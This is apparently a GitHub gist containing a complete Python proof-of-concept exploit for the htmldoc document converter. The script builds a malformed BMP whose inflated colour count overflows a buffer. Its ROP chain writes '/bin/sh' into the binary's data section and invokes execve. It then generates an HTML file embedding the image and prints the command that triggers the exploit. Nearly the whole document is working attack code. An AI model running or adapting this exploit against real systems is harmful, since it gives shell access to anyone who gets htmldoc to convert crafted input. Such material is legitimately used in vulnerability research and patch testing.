-
-
Save ikerl/4d0302cd17e804f9ace0529cae5b060b to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| from pwn import * | |
| import sys | |
| import os | |
| def long(v=0): | |
| return v.to_bytes(4, "little") | |
| def dword(v=0): | |
| return v.to_bytes(4, "little") | |
| def word(v=0): | |
| return v.to_bytes(2, "little") | |
| def getc(v=0): | |
| return v.to_bytes(1, "little") | |
| log.info("Generating corrupted BMP image") | |
| colors_used = 4096 | |
| width = 1 | |
| height = 1 | |
| depth = 1 | |
| header = b"BM" | |
| out = bytearray() | |
| out += dword() | |
| out += word() | |
| out += word() | |
| out += dword() | |
| out += dword(0) # info_size | |
| out += long(width) # width | |
| out += long(height) # height | |
| out += word() | |
| out += word(depth) # depth | |
| out += dword(0) # compression | |
| out += dword(0) | |
| out += long(0) | |
| out += long(0) | |
| out += dword(colors_used) # colors_used | |
| out += dword() | |
| offset = 2920 | |
| binsh_offset = 32 | |
| total = colors_used*4 | |
| filename = "./htmldoc" | |
| elf = ELF(filename) | |
| rop = ROP(filename) | |
| # Gadgets | |
| pop_rdi = rop.find_gadget(["pop rdi","ret"]).address | |
| pop_rsi = rop.find_gadget(["pop rsi","ret"]).address | |
| pop_rdx = rop.find_gadget(["pop rdx","ret"]).address | |
| pop_rcx = rop.find_gadget(["pop rcx","ret"]).address | |
| pop_rax = rop.find_gadget(["pop rax","ret"]).address | |
| ret = rop.find_gadget(["ret"]).address | |
| syscall = rop.find_gadget(["syscall"]).address | |
| data_section_base = elf.get_section_by_name('.data').header.sh_addr | |
| log.info('Creating ropchain for writing "/bin/sh" in data section using snprintf') | |
| char_writer = next(elf.search(b"%c")) # %s | |
| binsh = "/bin/sh" | |
| payload = b"" | |
| for i in range(len(binsh)): | |
| payload += p64(pop_rdi) + p64(data_section_base+i) # rdi = .data | |
| payload += p64(pop_rsi) + p64(2) # rsi = 2 | |
| payload += p64(pop_rdx) + p64(char_writer) # rdx = %c | |
| payload += p64(pop_rcx) + p64(ord(binsh[i])) # rcx = A | |
| payload += p64(pop_rax) + p64(0) # rax = 0 | |
| payload += p64(elf.plt["snprintf"]) | |
| log.info('Creating ropchain to execute /bin/sh using syscall') | |
| # execve(0, "/bin/sh", 0) | |
| payload += p64(pop_rax) + p64(59) # rax = execve | |
| payload += p64(pop_rdi) + p64(data_section_base) # rdi = .data | |
| payload += p64(pop_rsi) + p64(0) # rsi = 0 | |
| payload += p64(pop_rdx) + p64(0) # rdx = 0 | |
| payload += p64(ret) | |
| payload += p64(syscall) | |
| out += b"B" * (offset) + payload + b"D" * (total - offset - len(payload)) | |
| for _ in range(width * height * depth): | |
| out += dword(ord("B")) | |
| with open("poc.bmp", "wb") as f: | |
| f.write(header + out) | |
| log.success("Corrupted BMP image created successfully") | |
| exploit = '<HTML><BODY><P><IMG SRC="./poc.bmp"></A></BODY></HTML>' | |
| with open("poc.html", "w") as f: | |
| f.write(exploit) | |
| log.success("poc.html created successfully") | |
| log.info("Exploit: {} --webpage -f out.pdf ./poc.html".format(filename)) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment